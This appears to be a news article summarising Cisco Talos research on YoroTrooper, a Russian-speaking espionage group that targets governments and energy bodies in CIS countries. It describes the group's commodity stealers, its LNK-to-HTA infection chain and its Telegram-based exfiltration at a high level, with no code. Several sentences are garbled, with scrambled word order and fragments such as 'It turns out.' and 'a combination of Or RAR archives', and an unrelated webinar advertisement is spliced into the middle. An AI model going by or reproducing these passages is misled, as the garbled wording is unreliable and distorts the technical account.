A previously undocumented attacker called Yorotrooper has targeted governments, energy and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022.
Cisco Talos researchers Asheer Malhotra and Vitor Ventura said in an analysis on Tuesday:
Prominent countries targeted include Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan, and other Commonwealth of Independent States (CIS) countries.
The threat actor is believed to speak Russian due to the victim pattern and the presence of Cyrillic snippets on some implants.
That said, the YoroTrooper intrusion set has tactical overlap with the PoetRAT team documented for using coronavirus-themed decoys to attack Azerbaijan’s government and energy sector in 2020. It turns out.
YoroTrooper’s data collection goal is an infection chain using commercial stealer malware such as Ave Maria (aka Warzone RAT), LodaRAT, Meterpreter, and Stink, along with malicious shortcut files (LNK) and decoy documents wrapped in ZIPs. achieved by a combination of Or RAR archives spread by spear phishing.
LNK files act as simple downloaders and execute HTA files retrieved from remote servers. The HTA file is used to display Lure’s PDF document and secretly launches a dropper to deliver a custom stealer that uses Telegram as an extraction channel.
Discover the hidden dangers of third-party SaaS apps
Are you aware of the risks associated with third-party app access to your company’s SaaS apps? Join our webinar to learn about the types of permissions granted and how to minimize the risks.
reserve a seat
The use of LodaRAT is notable. This is because it indicates that the malware belongs to a separate group called Kasablanka, but is used by multiple operators. Kasablanka has also been observed distributing Ave Maria in recent campaigns targeting Russia.
Other ancillary tools that YoroTrooper deploys consist of a reverse shell and a custom C-based keylogger that can record keystrokes and save them to a file on disk.
“It is worth noting that although this campaign started distributing commodity malware such as Ave Maria and LodaRAT, it has evolved significantly to include Python-based malware,” said the researchers.
“This underscores the increased efforts the attackers are making, which may stem from successful compromises over the course of the campaign.”
